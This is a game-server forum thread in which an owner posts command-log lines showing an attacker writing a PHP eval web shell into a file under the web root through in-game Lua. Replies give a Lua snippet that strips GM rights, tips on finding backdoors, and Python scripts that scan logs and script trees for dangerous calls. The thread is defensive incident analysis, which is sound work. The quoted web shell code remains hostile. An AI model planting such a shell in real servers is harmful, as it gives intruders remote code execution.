BorzZ (Posted March 25, 2016)

Hello guys, I've got a big question which is driving me crazy! Someone somehow hacked my server and used a Lua command IN GAME to upload a file inside my website, to hack my server and make everyone on the server a GM! Look at this; I found it in DoCommand (Commands Log):

[03-24 02:57:25][ExecWork]Cha-Chibi+533: lua haxfilename = "C:\\Program Files (x86)\\Zend\\Apache2\\htdocs\\classes\\smarty\\internals\\core.smarty.php"
[03-24 02:57:32][ExecWork]Cha-Chibi+533: lua if(fileexists(haxfilename) ~= false) then haxfile = io.open(haxfilename,'a');end
[03-24 02:57:38][ExecWork]Cha-Chibi+533: lua haxfile:write("<?php $query = stripslashes($_POST[\'query\']);")
[03-24 02:57:43][ExecWork]Cha-Chibi+533: lua haxfile:write("eval($query); ;?> <form method=\"POST\" action=\"<?PHP echo stripslashes($_SERVER[\'PHP_SELF\']);?>")
[03-24 02:57:47][ExecWork]Cha-Chibi+533: lua haxfile:write("\" accept-charset=\"UTF-8\">")
[03-24 02:57:51][ExecWork]Cha-Chibi+533: lua haxfile:write(" <textarea name=\"query\" cols=\"48\" rows=\"8\" ></textarea>")
[03-24 02:57:55][ExecWork]Cha-Chibi+533: lua haxfile:write("<p><input type=\"submit\" value=\"Submit\"></p></form>")
[03-24 02:57:59][ExecWork]Cha-Chibi+533: lua haxfile:close()
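The DoCommand log above is the record a server owner should be watching: an in-game "lua" command that opens a file under the web root and writes PHP into it is visible there before anyone notices the GM flags. The following Python script is an added example, not code from the thread or from any PKO server package. It parses the log format shown in the post (timestamp, source tag, "Cha-name+id" actor, command), tags each lua command with the indicators it trips, and lists the characters whose commands together opened and wrote a file. The sample input is the first three lines and the final close() from the post plus one constructed harmless line; the indicator names and regexes are my own assumptions about what is worth flagging.

```python
import re
from collections import defaultdict

# Log lines quoted from the first post of this thread (abridged), followed by one
# constructed harmless line so the filter has something to leave alone.
LOG = r"""
[03-24 02:57:25][ExecWork]Cha-Chibi+533: lua haxfilename = "C:\\Program Files (x86)\\Zend\\Apache2\\htdocs\\classes\\smarty\\internals\\core.smarty.php"
[03-24 02:57:32][ExecWork]Cha-Chibi+533: lua if(fileexists(haxfilename) ~= false) then haxfile = io.open(haxfilename,'a');end
[03-24 02:57:38][ExecWork]Cha-Chibi+533: lua haxfile:write("<?php $query = stripslashes($_POST[\'query\']);")
[03-24 02:57:59][ExecWork]Cha-Chibi+533: lua haxfile:close()
[03-24 03:10:02][ExecWork]Cha-Admin+1: lua print(GetChaDefaultName(playerData))
"""

# [MM-DD hh:mm:ss][Source]Cha-<name>+<id>: <command>
LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\]\[(?P<src>[^\]]+)\](?P<actor>[^:]+): (?P<cmd>.*)$")

# Indicators (assumed, not from the server) that an in-game lua command reaches the host
# rather than the game state.
INDICATORS = {
    "file_exists": re.compile(r"\bfileexists\s*\("),
    "file_open": re.compile(r"\bio\.open\s*\("),
    "file_write": re.compile(r":write\s*\("),
    "file_close": re.compile(r":close\s*\("),
    "shell_exec": re.compile(r"\b(os\.execute|io\.popen)\s*\("),
    "dynamic_code": re.compile(r"\b(loadstring|dofile|loadfile)\s*\("),
    "web_payload": re.compile(r"<\?php", re.IGNORECASE),
    "webroot_path": re.compile(r"(htdocs|wwwroot|public_html|www)[\\/]", re.IGNORECASE),
}


def parse_line(line):
    """Split one DoCommand line into ts, src, actor and cmd; None if it is not in that format."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(cmd):
    """Names of the indicators that fire on one command; only 'lua ...' commands are examined."""
    if not cmd.startswith("lua "):
        return []
    body = cmd[4:]
    return [name for name, rx in INDICATORS.items() if rx.search(body)]


def scan_log(text):
    """Every parsed command that fires at least one indicator, in log order."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        found = classify(rec["cmd"])
        if found:
            hits.append({"ts": rec["ts"], "actor": rec["actor"], "indicators": found, "cmd": rec["cmd"]})
    return hits


def actors_writing_files(hits):
    """Actors whose commands, taken together, opened a file and wrote to it from in-game Lua."""
    seen = defaultdict(set)
    for h in hits:
        seen[h["actor"]].update(h["indicators"])
    return sorted(actor for actor, s in seen.items() if {"file_open", "file_write"} <= s)


if __name__ == "__main__":
    hits = scan_log(LOG)
    for h in hits:
        print(f'{h["ts"]} {h["actor"]:<16} {",".join(h["indicators"]):<24} {h["cmd"][:70]}')
    print("file written from in-game lua by:", actors_writing_files(hits))
```

Running it over the real log file instead of the embedded sample is a matter of passing the file's contents to scan_log; the open-plus-write correlation per actor is what turns eight individually bland lines into one clear finding.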
MonkeyCode (Posted March 26, 2016, edited)

This is one of the oldest hacks in the book. Ideally, this isn't the actual problem. First, find out how the hacker was able to get a GM-authorized account. Some possibilities: web backdoor, SQL injection, embedded Lua script within the server files themselves. Now, a prevention (assuming you use V3ct0r's GS), and you alone know who your GMs are:

    -- Strip GM level from any character whose name is not yours
    if GetGmLv(playerData) > 0 then
        if GetChaDefaultName(playerData) ~= 'yourName' then
            SetGmLv(playerData, 0)
        end
    end

Of course, not the brightest solution, but this would automatically prevent Lua commands from being executed in-game by unauthorized guests.

Edited March 26, 2016 by xtc
BorzZ (Posted March 26, 2016)

4 hours ago, xtc said:
> This is one of the oldest hacks in the book. Ideally, this isn't the actual problem. First, find out how the hacker was able to get a GM-authorized account. Some possibilities: web backdoor, SQL injection, embedded Lua script within the server files themselves. Now, a prevention (assuming you use V3ct0r's GS), and you alone know who your GMs are:
>
>     if GetGmLv(playerData) > 0 then
>         if GetChaDefaultName(playerData) ~= 'yourName' then
>             SetGmLv(playerData, 0)
>         end
>     end
>
> Of course, not the brightest solution, but this would automatically prevent Lua commands from being executed in-game by unauthorized guests.

Can you tell me, is it possible to find out if there are any bds (backdoors) in my server files?
V3ct0r (Posted March 29, 2016)

@BorzZ You have to scan all .lua files. It is hard work, so you should take the files from trusted sources.
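Scanning every .lua file by eye is the hard work V3ct0r mentions; taking the files from a trusted source makes it mechanical, because you can hash the trusted copy and only read the scripts that differ. The script below is an added example, not code from the thread or from any PKO server package: it hashes both trees with SHA-256, reports added, removed and modified scripts, and then lists, in the new or changed files only, the lines that call host-level Lua functions or SetGmLv (the GM-level setter named in this thread). The directory layout, file names and file contents in build_demo are constructed for the demonstration, and the list of functions in SUSPICIOUS is my own choice.

```python
import hashlib
import os
import re
import tempfile

# Calls worth reading by hand when they appear in a script you did not write yourself:
# host file/process access, code loaded at run time, and the GM-level setter from this thread.
SUSPICIOUS = re.compile(r"\b(io\.open|io\.popen|os\.execute|os\.remove|loadstring|dofile|SetGmLv)\s*\(")


def hash_lua_tree(root):
    """Map 'relative/path.lua' -> SHA-256 hex digest for every .lua file below root."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".lua"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff_trees(trusted, deployed):
    """Paths added to, removed from, or modified in the deployed tree relative to the trusted copy."""
    t, d = hash_lua_tree(trusted), hash_lua_tree(deployed)
    added = sorted(set(d) - set(t))
    removed = sorted(set(t) - set(d))
    modified = sorted(p for p in set(t) & set(d) if t[p] != d[p])
    return added, removed, modified


def suspicious_lines(path):
    """(line number, line) pairs that call a SUSPICIOUS function outside a '--' line comment."""
    found = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for n, line in enumerate(fh, 1):
            code = line.split("--", 1)[0]  # crude: also cuts a '--' inside a string literal
            if SUSPICIOUS.search(code):
                found.append((n, line.rstrip()))
    return found


def review(trusted, deployed):
    """Integrity diff plus a call scan of every script that is new or changed versus the trusted copy."""
    added, removed, modified = diff_trees(trusted, deployed)
    report = {"added": added, "removed": removed, "modified": modified, "findings": {}}
    for rel in added + modified:
        hits = suspicious_lines(os.path.join(deployed, rel))
        if hits:
            report["findings"][rel] = hits
    return report


def build_demo():
    """Constructed sample: a trusted tree, and a deployed tree with one edited and one dropped-in script."""
    base = tempfile.mkdtemp()
    trusted, deployed = os.path.join(base, "trusted"), os.path.join(base, "deployed")
    clean = "function OnLogin(role)\n  Notice('welcome')\nend\n"
    injected = "function OnLoginHook(role)\n  SetGmLv(role, 99) -- injected\nend\n"
    files = {
        (trusted, "script/hooks.lua"): clean,
        (trusted, "script/old_event.lua"): "-- retired event\n",
        (deployed, "script/hooks.lua"): clean + injected,
        (deployed, "script/extra.lua"): "local f = io.open('C:/htdocs/x.php', 'a')\n",
    }
    for (root, rel), body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return trusted, deployed


if __name__ == "__main__":
    t, d = build_demo()
    rep = review(t, d)
    for key in ("added", "removed", "modified"):
        print(f"{key}: {rep[key]}")
    for rel, hits in rep["findings"].items():
        for n, line in hits:
            print(f"{rel}:{n}: {line}")
```

Point review() at the trusted copy and the live server directory instead of the demo trees; a clean result is the empty lists, and anything in "findings" is a line to read before the server goes back up.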
DevMorgan (Posted April 15, 2016)

How do I use

    if GetGmLv(playerData) > 0 then
        if GetChaDefaultName(playerData) ~= 'yourName' then
            SetGmLv(playerData, 0)
        end
    end

in addon.lua?